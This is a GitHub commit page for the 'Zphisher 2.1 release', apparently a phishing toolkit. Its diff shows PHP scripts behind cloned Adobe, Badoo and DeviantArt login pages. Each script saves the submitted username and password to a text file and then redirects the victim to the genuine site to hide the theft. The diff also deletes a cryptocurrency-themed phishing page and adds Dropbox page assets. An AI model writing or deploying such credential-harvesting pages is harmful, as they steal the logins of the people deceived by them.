Skip to content

Commit 931f3d9

Browse files
committed
Zphisher 2.1 release
1 parent b7196f6 commit 931f3d9

File tree

168 files changed

+8666
-50929
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

168 files changed

+8666
-50929
lines changed

.sites/adobe/login.php

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,6 @@
11
<?php
22

3-
file_put_contents("usernames.txt", "Adobe Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
3+
file_put_contents("usernames.txt", "Adobe Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
44
header('Location: https://adobe.ly/2OE9ZKL');
55
exit();
6+
?>

.sites/badoo/login.php

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,6 @@
11
<?php
22

3-
file_put_contents("usernames.txt", "Badoo Username: " . $_POST['email'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
3+
file_put_contents("usernames.txt", "Badoo Username: " . $_POST['email'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
44
header('Location: https://badoo.com/forgot/');
55
exit();
6+
?>

.sites/cryptocoinsniper/login.html

Lines changed: 0 additions & 116 deletions
This file was deleted.

.sites/cryptocoinsniper/login.php

Lines changed: 0 additions & 5 deletions
This file was deleted.

.sites/deviantart/login.html

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,7 @@
1212
<meta name="description" content="DeviantArt is the world's largest online social community for artists and art enthusiasts, allowing people to connect through the creation and sharing of art.">
1313
<meta name="keywords" content="Art, Digital Art, Photography, Traditional Art, Community Art, Contemporary Art, Modern Art, Skins, Themes, Poetry, Prose, Applications, Wallpapers, Online Art, graphic Design, web Design, gaming, photography, animation, comic Books, digital Images">
1414
<meta name="classification" content="Art">
15-
<meta name="copyright" content="Copyright 2020 deviantART">
15+
<meta name="copyright" content="Copyright 2021 deviantART">
1616
<meta name="apple-itunes-app" content="app-id=925219396">
1717
<meta name="twitter:site" content="@deviantart">
1818
<meta name="twitter:card" content="summary_large_image">
@@ -321,7 +321,7 @@
321321

322322
<footer id="depths">
323323
<div class="depths-inner">
324-
<div class="footer_copyright">©2020 DeviantArt. All rights reserved</div>
324+
<div class="footer_copyright">©2021 DeviantArt. All rights reserved</div>
325325
<nav class="footer_tx_links">
326326
<ul class="footer-menu-list">
327327
<li class="footer-menu-list-item">

.sites/deviantart/login.php

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,6 @@
11
<?php
22

3-
file_put_contents("usernames.txt", "Deviantart Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
3+
file_put_contents("usernames.txt", "Deviantart Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
44
header('Location: https://www.deviantart.com/users/forgot/');
55
exit();
6+
?>

.sites/dropbox/dropbox1.png

67.3 KB
Loading

.sites/dropbox/dropbox2.png

1.9 KB
Loading

.sites/dropbox/dropbox3.png

387 Bytes
Loading

.sites/dropbox/dropbox4.svg

Lines changed: 24 additions & 0 deletions
Loading

0 commit comments

Comments
 (0)